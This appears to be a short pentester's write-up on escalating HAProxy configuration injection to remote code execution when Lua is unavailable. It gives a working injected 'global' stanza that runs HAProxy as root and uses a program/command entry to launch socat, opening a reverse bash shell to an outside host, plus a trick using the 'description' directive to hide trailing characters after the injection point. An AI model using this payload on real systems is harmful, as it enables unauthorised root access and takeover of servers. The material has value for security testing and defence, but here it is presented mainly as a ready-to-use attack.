Slight problem on the job: you can inject some backend block rules into a HAProxy config, how do you get RCE when LUA isn’t compiled in? Well it turns out you can use the master-worker+program+command configuration stanzas! Worked on v2.8 at least.

HAProxy will refuse anything if you have two backends with the same name but you can (re-)open the global (and default) section several times. It’s weird but it also means we can inject from anywhere!

global
    master-worker
    user root
    group root
    program testing
    command /usr/bin/socat TCP:come-back.com:9999 EXEC:'bash',pty,stderr,setsid,sigint,sane

You can also use the -dC flag to have HAProxy spit out the configuration file as it sees it.

Bonus: if you can’t use a comment (‘#’) character to hide the chars after the injection point, use description, it will act as a line comment:

backend commented-out
    mode http   # <= specify a mode or it won't be valid config
    description __hide me under the carpet__